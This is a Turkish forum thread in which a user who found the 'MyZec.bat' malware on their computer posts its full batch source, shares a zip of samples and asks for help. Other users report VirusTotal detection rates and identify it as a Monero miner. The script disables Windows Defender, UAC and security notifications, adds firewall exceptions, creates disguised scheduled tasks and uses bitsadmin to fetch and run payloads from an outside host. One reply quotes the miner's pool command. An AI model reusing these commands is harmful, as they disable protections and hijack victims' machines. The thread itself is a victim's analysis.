Üye Girişi
Bağlan Google+ ile Bağlan Facebook ile Bağlan
Yeni Kayıt
Tüm Forumlar
  • Tüm Forumlar
  • İşletim Sistemleri ve Yazılımlar
  • Yazılım Genel
  • Güvenlik Programları
  • Bu Konuda
Şimdi Ara

MyZec Virüs Kodlaması...

Sıcak Fırsatlarda Tıklananlar
Editörün Seçtiği Fırsatlar
Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
2 Misafir - 2 Masaüstü
5 sn
4
Cevap
1
Favori
1.093
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
Konuya Özel
2 oy
Öne Çıkar
Cevapla
Sayfa: 1
Giriş
Mesaj
  • Arkadaşlar Yakın Zamanda Bilgisayarıma Bulaşan "MyZec.bat" adlı virüs buldum.

    Kodlaması:
    :VARE
    title MyZec
    nircmd.exe win hide ititle "MyZec"
    killall /F /IM bitsadmin.exe
    attrib +s +a +h c:\zec
    attrib +s +a +h c:\zec\*
    nircmd.exe regsetval dword "HKLM\Software\Policies\Microsoft\Windows Defender" "DisableAntiSpyware" 1
    nircmd.exe regsetval dword "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" "ConsentPromptBehaviorAdmin" 0
    nircmd.exe regsetval dword "HKLM\SOFTWARE\Microsoft\Security Center" "AntiVirusDisableNotify" 1
    nircmd.exe regsetval dword "HKLM\SOFTWARE\Microsoft\Security Center" "FirewallDisableNotify" 1
    nircmd.exe regsetval dword "HKLM\SOFTWARE\Microsoft\Security Center" "UpdatesDisableNotify" 1
    nircmd.exe regsetval dword "HKLM\SOFTWARE\Microsoft\Security Center\Svc" "AntiVirusDisableNotify" 1
    nircmd.exe regsetval dword "HKLM\SOFTWARE\Microsoft\Security Center\Svc" "FirewallDisableNotify" 1
    nircmd.exe regsetval dword "HKLM\SOFTWARE\Microsoft\Security Center\Svc" "UpdatesDisableNotify" 1
    nircmd.exe regsetval dword "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" "Start" 4
    nircmd.exe regsetval dword "HKLM\SOFTWARE\Policies\Microsoft\Windows\Explorer" "DisableNotificationCenter" 1
    netsh advfirewall firewall add rule name="WePrint" dir=in action=allow profile=any description="WePrint Firewall Exception" program="C:\zec\taskmgr.exe"
    netsh advfirewall firewall add rule name="WePrint" dir=in action=allow profile=any description="WePrint Firewall Exception" program="C:\zec\svchosts.exe"
    netsh advfirewall firewall add rule name="WePrint" dir=out action=allow profile=any description="WePrint Firewall Exception" program="C:\zec\svchosts.exe"
    netsh advfirewall firewall add rule name="WePrint" dir=out action=allow profile=any description="WePrint Firewall Exception" program="C:\zec\taskmgr.exe"
    SchTasks /Create /SC MINUTE /mo 1 /TN "Google Update" /TR "nircmd.exe exec hide c:\zec\start.bat" /IT /F /RL HIGHEST
    SchTasks /Create /SC HOURLY /TN "GoogleUpdate" /TR "nircmd.exe exec hide c:\zec\start.bat" /IT /F /RL HIGHEST
    tasklist /FI "IMAGENAME eq taskmgr.exe" 2>NUL | find /I /N "taskmgr.exe">NUL
    IF "%ERRORLEVEL%" EQU "1" (
    Bitsadmin.exe /cache /clear
    Bitsadmin.exe /transfer "MyZec"http://guardia.us/MyZec.txt C:\zec\config.txt
    Bitsadmin.exe /transfer "MyZec2"http://guardia.us/MyZec2.txt C:\zec\config2.bat
    nircmd.exe exec hide c:\zec\config2.bat
    nircmd.exe exec hide c:\zec\taskmgr.exe
    )
    tasklist /FI "IMAGENAME eq taskmgr.exe" 2>NUL | find /I /N "taskmgr.exe">NUL
    IF "%ERRORLEVEL%" EQU "1" (
    tasklist /FI "IMAGENAME eq svchosts.exe" 2>NUL | find /I /N "svchosts.exe">NUL
    IF "%ERRORLEVEL%" EQU "1" (
    Bitsadmin.exe /transfer "MyXmr"http://guardia.us/MyXmr.txt C:\zec\MyXmr.bat
    nircmd.exe exec hide c:\zec\MyXmr.bat
    )
    )
    nircmd.exe win close ititle "MyZec"
    :END


    Ben Linux Tabanlı İşletim Sistemi Üzerinden Virüsü Arşivledim.
    Çözüm İçin Bir Uygulama Yapmaya Çalışıyorum.
    İncelemek İsteyenlere Paylaşılır...
    Not:Virüs Sadece Google Chrome'da "file:\\C:\zec\" adresi ile görünüyor...
    http://my-depo.tk/MyZec-Virus.zip







  • Web siteye girdiğimde şu bilgiler yer almaktadır...

    svchosts.exe -o stratum+tcp://pool.minexmr.com:7777 -u 63f0c1d6af5d5047477fa98f90a4a16c0d3dbe5457109f6780a5f2a02650f3dd -p x

    şifreyi hangi türde kodladığını nerden anlayabilrim...
  • Yeni bir metin belgesi açarak kodları kopyala-yapıştır yaptım. VirusTotal'de tarattım, ancak 59 antivirüsten 2 tanesi algılayabildi:https://www.virustotal.com/#/file/233cfb2366864d37fc3ac1ec07e3924b9a7898a93c53351e6b1487b572d95ae5/detection
    O da Kaspersky ile ZoneAlarm. Bu zararlı yazılım galiba en azından 6 aydır var. Bir veritabanına falan eklemek bu kadar mı zor?
    Düzenleme: Artık 57 antivirüsten 7 tanesi algılayabiliyor.



    < Bu mesaj bu kişi tarafından değiştirildi Türkçesever -- 22 Ocak 2018; 1:8:13 >




  • quote:

    Orijinalden alıntı: klpplk2147

    Web siteye girdiğimde şu bilgiler yer almaktadır...

    svchosts.exe -o stratum+tcp://pool.minexmr.com:7777 -u 63f0c1d6af5d5047477fa98f90a4a16c0d3dbe5457109f6780a5f2a02650f3dd -p x

    şifreyi hangi türde kodladığını nerden anlayabilrim...

    Virüsler bile amaç değiştirdi artık. Program Monero (dijital para birimi) mining yapıyor.
    • 
Sayfa: 1

Benzer içerikler

- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.
Hizmet kalitesi için çerezleri kullanabiliriz. DH’ye girerek kullanım izni vermiş sayılırsınız.
Anladım Veri Politikamız